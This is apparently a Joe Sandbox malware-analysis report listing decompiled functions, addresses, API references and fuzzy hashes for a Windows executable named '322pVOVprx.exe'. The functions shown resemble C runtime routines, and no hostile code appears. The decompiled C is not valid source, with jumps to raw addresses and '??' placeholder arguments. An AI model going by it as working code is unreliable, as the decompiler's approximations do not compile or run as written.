                                                                                                                                                                                                                                                        			E00007FF67FF6E5AD4D3C(void* __ebx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __r8, void* __r9, void* __r10, long long _a8, long long _a16) {
                                                                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                                                        				signed long long _v48;
                                                                                                                                                                                                                                                        				signed long long _v56;
                                                                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                                                                        				long long _v72;
                                                                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                                                                        				long long _t57;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t29 = __ebx;
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				_a16 = __rsi;
                                                                                                                                                                                                                                                        				_t57 = __r8;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD08A0(__rax, __r9, __rdx, __rdx, __r8, __rcx, __r9) != 0) goto 0xe5ad4e09;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4A1C(__rax, __r9,  &_v40, __rdx, __r8);
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_v32 + 0xc)) != 0xfde9) goto 0xe5ad4d9c;
                                                                                                                                                                                                                                                        				if (_v16 == 0) goto 0xe5ad4dd3;
                                                                                                                                                                                                                                                        				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
                                                                                                                                                                                                                                                        				goto 0xe5ad4dd3;
                                                                                                                                                                                                                                                        				_t28 = E00007FF67FF6E5ACDFCC(_v16, _v40);
                                                                                                                                                                                                                                                        				if (_t28 != 0) goto 0xe5ad4dbe;
                                                                                                                                                                                                                                                        				if (_v16 == _t28) goto 0xe5ad4db7;
                                                                                                                                                                                                                                                        				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
                                                                                                                                                                                                                                                        				goto 0xe5ad4dd3;
                                                                                                                                                                                                                                                        				if (_v16 == 0) goto 0xe5ad4dd1;
                                                                                                                                                                                                                                                        				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
                                                                                                                                                                                                                                                        				_v48 = _v48 & 0x00000000;
                                                                                                                                                                                                                                                        				r9d = _t29;
                                                                                                                                                                                                                                                        				_v56 = _v56 & 0x00000000;
                                                                                                                                                                                                                                                        				_v64 = 0x3f;
                                                                                                                                                                                                                                                        				_v72 = _t57;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACF0B8();
                                                                                                                                                                                                                                                        				return _t28;
                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                        0x7ff6e5ad4d3c
                                                                                                                                                                                                                                                        0x7ff6e5ad4d3c
                                                                                                                                                                                                                                                        0x7ff6e5ad4d41
                                                                                                                                                                                                                                                        0x7ff6e5ad4d4e
                                                                                                                                                                                                                                                        0x7ff6e5ad4d68
                                                                                                                                                                                                                                                        0x7ff6e5ad4d73
                                                                                                                                                                                                                                                        0x7ff6e5ad4d85
                                                                                                                                                                                                                                                        0x7ff6e5ad4d8c
                                                                                                                                                                                                                                                        0x7ff6e5ad4d93
                                                                                                                                                                                                                                                        0x7ff6e5ad4d9a
                                                                                                                                                                                                                                                        0x7ff6e5ad4d9c
                                                                                                                                                                                                                                                        0x7ff6e5ad4da3
                                                                                                                                                                                                                                                        0x7ff6e5ad4da9
                                                                                                                                                                                                                                                        0x7ff6e5ad4db0
                                                                                                                                                                                                                                                        0x7ff6e5ad4dbc
                                                                                                                                                                                                                                                        0x7ff6e5ad4dc3
                                                                                                                                                                                                                                                        0x7ff6e5ad4dca
                                                                                                                                                                                                                                                        0x7ff6e5ad4dd3
                                                                                                                                                                                                                                                        0x7ff6e5ad4dd9
                                                                                                                                                                                                                                                        0x7ff6e5ad4ddc
                                                                                                                                                                                                                                                        0x7ff6e5ad4de5
                                                                                                                                                                                                                                                        0x7ff6e5ad4def
                                                                                                                                                                                                                                                        0x7ff6e5ad4df4
                                                                                                                                                                                                                                                        0x7ff6e5ad4e08

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                        • Opcode ID: 0f42707fb1ffb418dedee9f0e1d40c636837d34774735cfb582c9132718562e6
                                                                                                                                                                                                                                                        • Instruction ID: 29fb27d52dd1bac82b802b4dd0a760738492622247a84cffa6705143e7b85122
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f42707fb1ffb418dedee9f0e1d40c636837d34774735cfb582c9132718562e6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5412C13B0878155F760671994217B95650EF80FA8F144238EE9CC6AD5DF7ED8418B07
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 54%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC7E6C(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
                                                                                                                                                                                                                                                        				long long _v56;
                                                                                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				void* __r14;
                                                                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                                                                        				intOrPtr _t36;
                                                                                                                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                                                                                                                        				intOrPtr* _t65;
                                                                                                                                                                                                                                                        				long long _t71;
                                                                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                                                                        				long long _t87;
                                                                                                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                                                                                                        				intOrPtr* _t89;
                                                                                                                                                                                                                                                        				void* _t99;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t73 = __rcx;
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				r14d = __ecx;
                                                                                                                                                                                                                                                        				if (__ecx == 0) goto 0xe5ac7fdb;
                                                                                                                                                                                                                                                        				_t2 = _t73 - 1; // -1
                                                                                                                                                                                                                                                        				if (_t2 - 1 <= 0) goto 0xe5ac7eaa;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(__rax);
                                                                                                                                                                                                                                                        				_t3 = _t88 + 0x16; // 0x16
                                                                                                                                                                                                                                                        				_t42 = _t3;
                                                                                                                                                                                                                                                        				 *__rax = _t42;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				goto 0xe5ac7fdb;
                                                                                                                                                                                                                                                        				r8d = 0x104;
                                                                                                                                                                                                                                                        				GetModuleFileNameW(??, ??, ??);
                                                                                                                                                                                                                                                        				_t89 =  *0xe5afc778; // 0x1e5fc522256
                                                                                                                                                                                                                                                        				 *0xe5afc750 = 0xe5afc7a0;
                                                                                                                                                                                                                                                        				if (_t89 == 0) goto 0xe5ac7eda;
                                                                                                                                                                                                                                                        				if ( *_t89 != _t42) goto 0xe5ac7edd;
                                                                                                                                                                                                                                                        				_t65 =  &_a32;
                                                                                                                                                                                                                                                        				_a24 = _t88;
                                                                                                                                                                                                                                                        				_v56 = _t65;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				_a32 = _t88;
                                                                                                                                                                                                                                                        				_t30 = E00007FF67FF6E5AC7C68(0xe5afc7a0, 0xe5afc7a0, 0xe5afc7a0, _t88, 0xe5afc7a0, __r8,  &_a24, _t99);
                                                                                                                                                                                                                                                        				r8d = 2;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC7E0C(_t30, _a24, _a32, __r8);
                                                                                                                                                                                                                                                        				_t71 = _t65;
                                                                                                                                                                                                                                                        				if (_t65 != 0) goto 0xe5ac7f35;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t65);
                                                                                                                                                                                                                                                        				 *_t65 = 0xc;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t65, _a24);
                                                                                                                                                                                                                                                        				goto 0xe5ac7ea3;
                                                                                                                                                                                                                                                        				_v56 =  &_a32;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC7C68(_t71, 0xe5afc7a0, _t71, _t88, 0xe5afc7a0, _t65 + _a24 * 8,  &_a24, _t99);
                                                                                                                                                                                                                                                        				if (r14d != 1) goto 0xe5ac7f6d;
                                                                                                                                                                                                                                                        				_t36 = _a24 - 1;
                                                                                                                                                                                                                                                        				 *0xe5afc768 = _t71;
                                                                                                                                                                                                                                                        				 *0xe5afc758 = _t36;
                                                                                                                                                                                                                                                        				goto 0xe5ac7fd6;
                                                                                                                                                                                                                                                        				_a16 = _t88;
                                                                                                                                                                                                                                                        				0xe5ad0f2c();
                                                                                                                                                                                                                                                        				if (_t36 == 0) goto 0xe5ac7f9c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18( &_a32, _a16);
                                                                                                                                                                                                                                                        				_a16 = _t88;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18( &_a32, _t71);
                                                                                                                                                                                                                                                        				goto 0xe5ac7fdb;
                                                                                                                                                                                                                                                        				_t87 = _a16;
                                                                                                                                                                                                                                                        				if ( *_t87 == _t88) goto 0xe5ac7fb7;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t87 + 8)) != _t88) goto 0xe5ac7fab;
                                                                                                                                                                                                                                                        				 *0xe5afc758 = 0;
                                                                                                                                                                                                                                                        				_a16 = _t88;
                                                                                                                                                                                                                                                        				 *0xe5afc768 = _t87;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t87 + 8, _t88 + 1);
                                                                                                                                                                                                                                                        				_a16 = _t88;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t87 + 8, _t71);
                                                                                                                                                                                                                                                        				return _t36;
                                                                                                                                                                                                                                                        			}

















                                                                                                                                                                                                                                                        0x7ff6e5ac7e6c
                                                                                                                                                                                                                                                        0x7ff6e5ac7e6c
                                                                                                                                                                                                                                                        0x7ff6e5ac7e81
                                                                                                                                                                                                                                                        0x7ff6e5ac7e86
                                                                                                                                                                                                                                                        0x7ff6e5ac7e8c
                                                                                                                                                                                                                                                        0x7ff6e5ac7e92
                                                                                                                                                                                                                                                        0x7ff6e5ac7e94
                                                                                                                                                                                                                                                        0x7ff6e5ac7e99
                                                                                                                                                                                                                                                        0x7ff6e5ac7e99
                                                                                                                                                                                                                                                        0x7ff6e5ac7e9c
                                                                                                                                                                                                                                                        0x7ff6e5ac7e9e
                                                                                                                                                                                                                                                        0x7ff6e5ac7ea5
                                                                                                                                                                                                                                                        0x7ff6e5ac7eb1
                                                                                                                                                                                                                                                        0x7ff6e5ac7ebc
                                                                                                                                                                                                                                                        0x7ff6e5ac7ec2
                                                                                                                                                                                                                                                        0x7ff6e5ac7ec9
                                                                                                                                                                                                                                                        0x7ff6e5ac7ed3
                                                                                                                                                                                                                                                        0x7ff6e5ac7ed8
                                                                                                                                                                                                                                                        0x7ff6e5ac7edd
                                                                                                                                                                                                                                                        0x7ff6e5ac7ee1
                                                                                                                                                                                                                                                        0x7ff6e5ac7ee9
                                                                                                                                                                                                                                                        0x7ff6e5ac7eee
                                                                                                                                                                                                                                                        0x7ff6e5ac7ef1
                                                                                                                                                                                                                                                        0x7ff6e5ac7efa
                                                                                                                                                                                                                                                        0x7ff6e5ac7f03
                                                                                                                                                                                                                                                        0x7ff6e5ac7f10
                                                                                                                                                                                                                                                        0x7ff6e5ac7f15
                                                                                                                                                                                                                                                        0x7ff6e5ac7f1b
                                                                                                                                                                                                                                                        0x7ff6e5ac7f1d
                                                                                                                                                                                                                                                        0x7ff6e5ac7f29
                                                                                                                                                                                                                                                        0x7ff6e5ac7f2b
                                                                                                                                                                                                                                                        0x7ff6e5ac7f30
                                                                                                                                                                                                                                                        0x7ff6e5ac7f47
                                                                                                                                                                                                                                                        0x7ff6e5ac7f4c
                                                                                                                                                                                                                                                        0x7ff6e5ac7f55
                                                                                                                                                                                                                                                        0x7ff6e5ac7f5a
                                                                                                                                                                                                                                                        0x7ff6e5ac7f5c
                                                                                                                                                                                                                                                        0x7ff6e5ac7f63
                                                                                                                                                                                                                                                        0x7ff6e5ac7f6b
                                                                                                                                                                                                                                                        0x7ff6e5ac7f71
                                                                                                                                                                                                                                                        0x7ff6e5ac7f78
                                                                                                                                                                                                                                                        0x7ff6e5ac7f81
                                                                                                                                                                                                                                                        0x7ff6e5ac7f87
                                                                                                                                                                                                                                                        0x7ff6e5ac7f8f
                                                                                                                                                                                                                                                        0x7ff6e5ac7f93
                                                                                                                                                                                                                                                        0x7ff6e5ac7f9a
                                                                                                                                                                                                                                                        0x7ff6e5ac7f9c
                                                                                                                                                                                                                                                        0x7ff6e5ac7fa9
                                                                                                                                                                                                                                                        0x7ff6e5ac7fb5
                                                                                                                                                                                                                                                        0x7ff6e5ac7fb7
                                                                                                                                                                                                                                                        0x7ff6e5ac7fbf
                                                                                                                                                                                                                                                        0x7ff6e5ac7fc3
                                                                                                                                                                                                                                                        0x7ff6e5ac7fca
                                                                                                                                                                                                                                                        0x7ff6e5ac7fd2
                                                                                                                                                                                                                                                        0x7ff6e5ac7fd6
                                                                                                                                                                                                                                                        0x7ff6e5ac7fed

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E5AC7E9E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AC9E18: RtlReleasePrivilege.NTDLL(?,?,?,00007FF6E5AD1E42,?,?,?,00007FF6E5AD1E7F,?,?,00000000,00007FF6E5AD2345,?,?,?,00007FF6E5AD2277), ref: 00007FF6E5AC9E2E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AC9E18: GetLastError.KERNEL32(?,?,?,00007FF6E5AD1E42,?,?,?,00007FF6E5AD1E7F,?,?,00000000,00007FF6E5AD2345,?,?,?,00007FF6E5AD2277), ref: 00007FF6E5AC9E38
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6E5ABB105), ref: 00007FF6E5AC7EBC
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastModuleNamePrivilegeRelease_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                        • API String ID: 1752791759-2589643366
                                                                                                                                                                                                                                                        • Opcode ID: 451d74355dc161a66dceda5f2de6aaf19e8d9a7005e0db8b635429319f1a01be
                                                                                                                                                                                                                                                        • Instruction ID: 2ad651b9ba64cfcf2b5641a5ab968747cc59d67af3bef34de5c351c6f4d1c9cf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 451d74355dc161a66dceda5f2de6aaf19e8d9a7005e0db8b635429319f1a01be
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02416F33B08B5285E714DF2994A02B86794EF45F94B544039EA0ECBB45DF3EEC41C34A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 29%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACC108(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, void* __r10, void* __r11, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
                                                                                                                                                                                                                                                        				intOrPtr _v0;
                                                                                                                                                                                                                                                        				signed long long _v8;
                                                                                                                                                                                                                                                        				signed int _t41;
                                                                                                                                                                                                                                                        				signed long long _t62;
                                                                                                                                                                                                                                                        				short* _t67;
                                                                                                                                                                                                                                                        				signed int* _t68;
                                                                                                                                                                                                                                                        				void* _t91;
                                                                                                                                                                                                                                                        				void* _t102;
                                                                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				_a24 = __rbp;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABADB0(0x1470, __rax, __r10, __r11);
                                                                                                                                                                                                                                                        				_t62 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_a5176 = _t62 ^ _t91 - __rax;
                                                                                                                                                                                                                                                        				r14d = r9d;
                                                                                                                                                                                                                                                        				r10d = r10d & 0x0000003f;
                                                                                                                                                                                                                                                        				_t103 = _t102 + __r8;
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx)) =  *((intOrPtr*)(0xe5afca30 + (__edx >> 6) * 8));
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                                                                                                                                                                        				if (__r8 - _t103 >= 0) goto 0xe5acc249;
                                                                                                                                                                                                                                                        				_t67 =  &_a40;
                                                                                                                                                                                                                                                        				if (__r8 - _t103 >= 0) goto 0xe5acc1b2;
                                                                                                                                                                                                                                                        				_t41 =  *__r8 & 0x0000ffff;
                                                                                                                                                                                                                                                        				if (_t41 != 0xa) goto 0xe5acc19e;
                                                                                                                                                                                                                                                        				 *_t67 = 0xd;
                                                                                                                                                                                                                                                        				_t68 = _t67 + 2;
                                                                                                                                                                                                                                                        				 *_t68 = _t41;
                                                                                                                                                                                                                                                        				if ( &(_t68[0]) -  &_a1744 < 0) goto 0xe5acc180;
                                                                                                                                                                                                                                                        				_a16 = _a16 & 0x00000000;
                                                                                                                                                                                                                                                        				_a8 = _a8 & 0x00000000;
                                                                                                                                                                                                                                                        				_v0 = 0xd55;
                                                                                                                                                                                                                                                        				_v8 =  &_a1752;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACF0B8();
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5acc241;
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5acc231;
                                                                                                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				r8d = r8d;
                                                                                                                                                                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xe5acc241;
                                                                                                                                                                                                                                                        				if (0 + _a24 < 0) goto 0xe5acc1fe;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
                                                                                                                                                                                                                                                        				goto 0xe5acc175;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__rcx)) = GetLastError();
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(_t39, 0, _a5176 ^ _t91 - __rax);
                                                                                                                                                                                                                                                        			}












                                                                                                                                                                                                                                                        0x7ff6e5acc108
                                                                                                                                                                                                                                                        0x7ff6e5acc10d
                                                                                                                                                                                                                                                        0x7ff6e5acc11f
                                                                                                                                                                                                                                                        0x7ff6e5acc127
                                                                                                                                                                                                                                                        0x7ff6e5acc131
                                                                                                                                                                                                                                                        0x7ff6e5acc142
                                                                                                                                                                                                                                                        0x7ff6e5acc150
                                                                                                                                                                                                                                                        0x7ff6e5acc154
                                                                                                                                                                                                                                                        0x7ff6e5acc16c
                                                                                                                                                                                                                                                        0x7ff6e5acc172
                                                                                                                                                                                                                                                        0x7ff6e5acc175
                                                                                                                                                                                                                                                        0x7ff6e5acc17b
                                                                                                                                                                                                                                                        0x7ff6e5acc183
                                                                                                                                                                                                                                                        0x7ff6e5acc185
                                                                                                                                                                                                                                                        0x7ff6e5acc190
                                                                                                                                                                                                                                                        0x7ff6e5acc197
                                                                                                                                                                                                                                                        0x7ff6e5acc19a
                                                                                                                                                                                                                                                        0x7ff6e5acc19e
                                                                                                                                                                                                                                                        0x7ff6e5acc1b0
                                                                                                                                                                                                                                                        0x7ff6e5acc1b2
                                                                                                                                                                                                                                                        0x7ff6e5acc1bd
                                                                                                                                                                                                                                                        0x7ff6e5acc1cb
                                                                                                                                                                                                                                                        0x7ff6e5acc1de
                                                                                                                                                                                                                                                        0x7ff6e5acc1e3
                                                                                                                                                                                                                                                        0x7ff6e5acc1ed
                                                                                                                                                                                                                                                        0x7ff6e5acc1f6
                                                                                                                                                                                                                                                        0x7ff6e5acc1fc
                                                                                                                                                                                                                                                        0x7ff6e5acc1fe
                                                                                                                                                                                                                                                        0x7ff6e5acc213
                                                                                                                                                                                                                                                        0x7ff6e5acc21c
                                                                                                                                                                                                                                                        0x7ff6e5acc227
                                                                                                                                                                                                                                                        0x7ff6e5acc22f
                                                                                                                                                                                                                                                        0x7ff6e5acc236
                                                                                                                                                                                                                                                        0x7ff6e5acc23c
                                                                                                                                                                                                                                                        0x7ff6e5acc247
                                                                                                                                                                                                                                                        0x7ff6e5acc277

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                        • Opcode ID: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                                                                                                                                                                                                                        • Instruction ID: c3eff2caf0e14113a3fce9e801f0cb291ef0b564f095446e567b1b0647701325
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84419123718A4186DB20DF29E4643A977A1FB88B84F844035EE4EC7758DF3DD841C745
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACE508(long long __rbx, long long __rsi, long long _a8, long long _a16) {
                                                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                                                                                        				short _v550;
                                                                                                                                                                                                                                                        				signed int _v552;
                                                                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                                                                        				signed long long _t54;
                                                                                                                                                                                                                                                        				signed long long _t55;
                                                                                                                                                                                                                                                        				signed short* _t57;
                                                                                                                                                                                                                                                        				signed short* _t59;
                                                                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				_a16 = __rsi;
                                                                                                                                                                                                                                                        				_t54 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t55 = _t54 ^ _t67 - 0x00000240;
                                                                                                                                                                                                                                                        				_v24 = _t55;
                                                                                                                                                                                                                                                        				_t59 =  &_v552;
                                                                                                                                                                                                                                                        				r8d = 0x20a;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				if (GetCurrentDirectoryW(??, ??) - 0x104 > 0) goto 0xe5ace57c;
                                                                                                                                                                                                                                                        				if (_v552 == 0) goto 0xe5ace5d7;
                                                                                                                                                                                                                                                        				if (_v550 != 0x3a) goto 0xe5ace5d7;
                                                                                                                                                                                                                                                        				_t37 =  >  ? _v552 & 0x0000ffff : _t59 - 0x20;
                                                                                                                                                                                                                                                        				_t38 = ( >  ? _v552 & 0x0000ffff : _t59 - 0x20) - 0x40;
                                                                                                                                                                                                                                                        				goto 0xe5ace5d7;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACDD40(_t59 - 0x61, _t59,  &_v552);
                                                                                                                                                                                                                                                        				_t57 = _t55;
                                                                                                                                                                                                                                                        				if (_t55 == 0) goto 0xe5ace5a4;
                                                                                                                                                                                                                                                        				if (GetCurrentDirectoryW(??, ??) != 0) goto 0xe5ace5b1;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t55);
                                                                                                                                                                                                                                                        				 *_t55 = 0xc;
                                                                                                                                                                                                                                                        				goto 0xe5ace5cf;
                                                                                                                                                                                                                                                        				if ( *_t57 == 0) goto 0xe5ace5cf;
                                                                                                                                                                                                                                                        				if (_t57[1] != 0x3a) goto 0xe5ace5cf;
                                                                                                                                                                                                                                                        				_t41 =  >  ?  *_t57 & 0x0000ffff : _t59 - 0x20;
                                                                                                                                                                                                                                                        				_t42 = ( >  ?  *_t57 & 0x0000ffff : _t59 - 0x20) - 0x40;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t55, _t57);
                                                                                                                                                                                                                                                        				_t26 = ( >  ?  *_t57 & 0x0000ffff : _t59 - 0x20) - 0x40;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(( >  ?  *_t57 & 0x0000ffff : _t59 - 0x20) - 0x40,  *_t57 & 0x0000ffff, _v24 ^ _t67 - 0x00000240);
                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                        0x7ff6e5ace508
                                                                                                                                                                                                                                                        0x7ff6e5ace50d
